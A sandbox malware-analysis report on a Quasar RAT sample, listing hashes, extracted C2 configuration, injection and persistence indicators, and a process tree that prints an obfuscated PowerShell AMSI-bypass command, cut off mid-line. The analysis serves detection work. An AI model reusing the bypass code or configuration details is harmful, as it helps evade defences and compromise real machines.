Analysis
-
max time kernel
1800s -
max time network
1789s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
08-05-2024 17:28
Behavioral task
behavioral1
Sample
Uni.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Uni.exe
Resource
win7-20240419-en
Behavioral task
behavioral3
Sample
Uni.exe
Resource
win10v2004-20240508-en
General
-
Target
Uni.exe
-
Size
409KB
-
MD5
7417c8c73e614f293152575f46134216
-
SHA1
cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805
-
SHA256
00c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3
-
SHA512
897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0
-
SSDEEP
6144:nMr2pJAJcC0B632U3GRbMfgvKFFhTEDPX1NbKoEn5MSU+h2f8/14m:LpyJcC+82U3GRGGp1M5Ys2f8/6m
Malware Config
Extracted
quasar
3.1.5
SLAVE
even-lemon.gl.at.ply.gg:33587
$Sxr-dOMA5C0pQTTpKjVsCp
-
encryption_key
UBXs44u6E81wxBGZxQHk
-
install_name
$sxr-powershell.exe
-
log_directory
$SXR-KEYLOGS
-
reconnect_delay
3000
-
startup_key
$sxr-powershell
-
subdirectory
$sxr-seroxen2
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/4920-1-0x0000000000B30000-0x0000000000B9C000-memory.dmp family_quasar C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 4392 created 588 4392 powershell.EXE winlogon.exe PID 1000 created 588 1000 powershell.EXE winlogon.exe -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
$sxr-powershell.exeinstall.exeinstall.exepid process 2524 $sxr-powershell.exe 4608 install.exe 3660 install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 6 raw.githubusercontent.com 7 raw.githubusercontent.com 10 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Drops file in System32 directory 16 IoCs
Processes:
powershell.EXEsvchost.exeOfficeClickToRun.exesvchost.exepowershell.EXEdescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6D1A73D92C4DC2751A4B5A2404E1BDCC svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9C237ECACBCB4101A3BE740DF0E53F83 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 OfficeClickToRun.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 4392 set thread context of 2164 4392 powershell.EXE dllhost.exe PID 1000 set thread context of 1984 1000 powershell.EXE dllhost.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeSCHTASKS.exeschtasks.exepid process 4648 schtasks.exe 1812 SCHTASKS.exe 4516 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEsvchost.exepowershell.EXEsvchost.exeOfficeClickToRun.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={447BF857-54C7-402E-9358-1A2490BB118D}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 08 May 2024 20:31:10 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.EXEpowershell.EXEdllhost.exedllhost.exepid process 4392 powershell.EXE 4392 powershell.EXE 4392 powershell.EXE 1000 powershell.EXE 1000 powershell.EXE 1000 powershell.EXE 4392 powershell.EXE 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 2164 dllhost.exe 1000 powershell.EXE 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe 1984 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
Uni.exe$sxr-powershell.exepowershell.EXEpowershell.EXEdllhost.exedllhost.exesvchost.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 4920 Uni.exe Token: SeDebugPrivilege 2524 $sxr-powershell.exe Token: SeDebugPrivilege 4392 powershell.EXE Token: SeDebugPrivilege 1000 powershell.EXE Token: SeDebugPrivilege 4392 powershell.EXE Token: SeDebugPrivilege 2164 dllhost.exe Token: SeDebugPrivilege 1000 powershell.EXE Token: SeDebugPrivilege 1984 dllhost.exe Token: SeAuditPrivilege 2508 svchost.exe Token: SeShutdownPrivilege 3436 Explorer.EXE Token: SeCreatePagefilePrivilege 3436 Explorer.EXE Token: SeAuditPrivilege 2508 svchost.exe Token: SeShutdownPrivilege 3436 Explorer.EXE Token: SeCreatePagefilePrivilege 3436 Explorer.EXE Token: SeAuditPrivilege 2508 svchost.exe Token: SeShutdownPrivilege 3436 Explorer.EXE Token: SeCreatePagefilePrivilege 3436 Explorer.EXE Token: SeShutdownPrivilege 3436 Explorer.EXE Token: SeCreatePagefilePrivilege 3436 Explorer.EXE Token: SeAuditPrivilege 2508 svchost.exe Token: SeShutdownPrivilege 3436 Explorer.EXE Token: SeCreatePagefilePrivilege 3436 Explorer.EXE Token: SeShutdownPrivilege 3436 Explorer.EXE Token: SeCreatePagefilePrivilege 3436 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
$sxr-powershell.exepid process 2524 $sxr-powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Uni.exe$sxr-powershell.exepowershell.EXEdllhost.exedescription pid process target process PID 4920 wrote to memory of 4648 4920 Uni.exe schtasks.exe PID 4920 wrote to memory of 4648 4920 Uni.exe schtasks.exe PID 4920 wrote to memory of 4648 4920 Uni.exe schtasks.exe PID 4920 wrote to memory of 2524 4920 Uni.exe $sxr-powershell.exe PID 4920 wrote to memory of 2524 4920 Uni.exe $sxr-powershell.exe PID 4920 wrote to memory of 2524 4920 Uni.exe $sxr-powershell.exe PID 4920 wrote to memory of 4608 4920 Uni.exe install.exe PID 4920 wrote to memory of 4608 4920 Uni.exe install.exe PID 4920 wrote to memory of 4608 4920 Uni.exe install.exe PID 4920 wrote to memory of 1812 4920 Uni.exe SCHTASKS.exe PID 4920 wrote to memory of 1812 4920 Uni.exe SCHTASKS.exe PID 4920 wrote to memory of 1812 4920 Uni.exe SCHTASKS.exe PID 2524 wrote to memory of 4516 2524 $sxr-powershell.exe schtasks.exe PID 2524 wrote to memory of 4516 2524 $sxr-powershell.exe schtasks.exe PID 2524 wrote to memory of 4516 2524 $sxr-powershell.exe schtasks.exe PID 2524 wrote to memory of 3660 2524 $sxr-powershell.exe install.exe PID 2524 wrote to memory of 3660 2524 $sxr-powershell.exe install.exe PID 2524 wrote to memory of 3660 2524 $sxr-powershell.exe install.exe PID 4392 wrote to memory of 2164 4392 powershell.EXE dllhost.exe PID 4392 wrote to memory of 2164 4392 powershell.EXE dllhost.exe PID 4392 wrote to memory of 2164 4392 powershell.EXE dllhost.exe PID 4392 wrote to memory of 2164 4392 powershell.EXE dllhost.exe PID 4392 wrote to memory of 2164 4392 powershell.EXE dllhost.exe PID 4392 wrote to memory of 2164 4392 powershell.EXE dllhost.exe PID 4392 wrote to memory of 2164 4392 powershell.EXE dllhost.exe PID 4392 wrote to memory of 2164 4392 powershell.EXE dllhost.exe PID 2164 wrote to memory of 588 2164 dllhost.exe winlogon.exe PID 2164 wrote to memory of 644 2164 dllhost.exe lsass.exe PID 2164 wrote to memory of 748 2164 dllhost.exe svchost.exe PID 2164 wrote to memory of 920 2164 dllhost.exe svchost.exe PID 2164 wrote to memory of 1004 2164 dllhost.exe dwm.exe PID 2164 wrote to memory of 628 2164 dllhost.exe svchost.exe PID 2164 wrote to memory of 964 2164 dllhost.exe svchost.exe PID 2164 wrote to memory of 1028 2164 dllhost.exe svchost.exe PID 2164 wrote to memory of 1120 2164 dllhost.exe svchost.exe PID 2164 wrote to memory of 1152 2164 dllhost.exe svchost.exe PID 2164 wrote to memory of 1228 2164 dllhost.exe svchost.exe PID 2164 wrote to memory of 1236 2164 dllhost.exe svchost.exe PID 2164 wrote to memory of 1244 2164 dllhost.exe svchost.exe PID 2164 wrote to memory of 1312 2164 dllhost.exe svchost.exe PID 2164 wrote to memory of 1428 2164 dllhost.exe svchost.exe PID 2164 wrote to memory of 1448 2164 dllhost.exe svchost.exe PID 2164 wrote to memory of 1460 2164 dllhost.exe svchost.exe PID 2164 wrote to memory of 1516 2164 dllhost.exe svchost.exe PID 2164 wrote to memory of 1592 2164 dllhost.exe svchost.exe PID 2164 wrote to memory of 1636 2164 dllhost.exe svchost.exe PID 2164 wrote to memory of 1660 2164 dllhost.exe svchost.exe PID 2164 wrote to memory of 1740 2164 dllhost.exe svchost.exe PID 2164 wrote to memory of 1788 2164 dllhost.exe svchost.exe PID 2164 wrote to memory of 1796 2164 dllhost.exe svchost.exe PID 2164 wrote to memory of 1892 2164 dllhost.exe svchost.exe PID 2164 wrote to memory of 1908 2164 dllhost.exe svchost.exe PID 2164 wrote to memory of 1376 2164 dllhost.exe spoolsv.exe PID 2164 wrote to memory of 2076 2164 dllhost.exe svchost.exe PID 2164 wrote to memory of 2204 2164 dllhost.exe svchost.exe PID 2164 wrote to memory of 2268 2164 dllhost.exe svchost.exe PID 2164 wrote to memory of 2456 2164 dllhost.exe svchost.exe PID 2164 wrote to memory of 2464 2164 dllhost.exe svchost.exe PID 2164 wrote to memory of 2508 2164 dllhost.exe svchost.exe PID 2164 wrote to memory of 2692 2164 dllhost.exe svchost.exe PID 2164 wrote to memory of 2704 2164 dllhost.exe svchost.exe PID 2164 wrote to memory of 2736 2164 dllhost.exe sysmon.exe PID 2164 wrote to memory of 2760 2164 dllhost.exe svchost.exe PID 2164 wrote to memory of 2768 2164 dllhost.exe svchost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{c40d6ff2-e818-49f0-a56b-2b1ffbe07ea5}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{2ed3ec06-3818-4543-ba68-17a489e2362b}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
- Drops file in System32 directory
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:SRXMIHCSkCIB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vgUFJbayVmqshx,[Parameter(Position=1)][Type]$JhwfwApowY)$sqHlAhREqYB=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+'f'+''+[Char](108)+'e'+[Char](99)+'ted'+[Char](68)+''+[Char](101)+''+[Char](108)+'eg'+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+'m'+''+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'ule',$False).DefineType(''+[Char](77)+''+[Char](121)+'Dele'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+[Char](84)+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+'la'+[Char](115)+''+[Char](115)+','+'P'+''+'u'+'bl'+'i'+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+''+[Char](101)+''+[Char](100)+','+[Char](65)+'n'+'s'+''+'i'+'C'+'l'+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$sqHlAhREqYB.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+','+[Char](72)+'i'+'d'+'e'+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+','+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$vgUFJbayVmqshx).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+'a'+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+'d');$sqHlAhREqYB.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+'o'+'k'+[Char](101)+'',''+'P'+'u'+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+','+'N'+''+[Char](101)+''+'w'+''+[Char](83)+'l'+[Char](111)+'t,'+[Char](86)+''+[Char](105)+''+'r'+'t'+'u'+''+[Char](97)+''+'l'+'',$JhwfwApowY,$vgUFJbayVmqshx).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+'a'+[Char](110)+'a'+'g'+''+[Char](101)+'d');Write-Output $sqHlAhREqYB.CreateType();}$fgoHRaScHykbp=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+''+'t'+''+'e'+''+'m'+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+'ic'+[Char](114)+'o'+[Char](115)+''+[Char](111)+'f'+[Char](116)+'.'+[Char](87)+''+'i'+''+[Char](110)+'3'+'2'+''+[Char](46)+'Un'+'s'+''+[Char](97)+''+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+[Char](105)+''+[Char](118)+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+''+[Char](104)+''+'o'+''+[Char](100)+''+'s'+'');$XoLUcKuitLhlFZ=$fgoHRaScHykbp.GetMethod(''+[Char](71)+''+'e'+''+'t'+'Pr'+[Char](111)+''+[Char](99)+''+[Char](65)+''+'d'+'d'+'r'+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+','+[Char](83)+'t'+[Char](97)+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RhUsMUdfdaDLafYrdLp=SRXMIHCSkCIB @([String])([IntPtr]);$eFRSRwBcGZUreYFZgXlSjS=SRXMIHCSkCIB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$McivxpKPkkK=$fgoHRaScHykbp.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'M'+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+'e'+'H'+''+[Char](97)+'n'+'d'+''+'l'+'e').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+'ne'+[Char](108)+''+[Char](51)+''+'2'+''+[Char](46)+'d'+[Char](108)+'l')));$EdDyTdnrRDOGyy=$XoLUcKuitLhlFZ.Invoke($Null,@([Object]$McivxpKPkkK,[Object]('L'+[Char](111)+'a'+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+''+'r'+'y'+[Char](65)+'')));$hOBMPBAqVwRvEXDfA=$XoLUcKuitLhlFZ.Invoke($Null,@([Object]$McivxpKPkkK,[Object](''+[Char](86)+'i'+'r'+''+'t'+''+'u'+''+[Char](97)+'l'+'P'+'r'+[Char](111)+''+[Char](116)+''+[Char](101)+'c'+'t'+'')));$cgnXEFn=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EdDyTdnrRDOGyy,$RhUsMUdfdaDLafYrdLp).Invoke(''+'a'+''+'m'+''+'s'+''+'i'+''+[Char](46)+''+'d'+''+'l'+''+'l'+'');$rZFCbzzCbmsPiTplw=$XoLUcKuitLhlFZ.Invoke($Null,@([Object]$cgnXEFn,[Object](''+[Char](65)+'m'+'s'+''+[Char](105)+''+[Char](83)+'c'+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$cOnJjPDveQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hOBMPBAqVwRvEXDfA,$eFRSRwBcGZUreYFZgXlSjS).Invoke($rZFCbzzCbmsPiTplw,[uint32]8,4,[ref]$cOnJjPDveQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$rZFC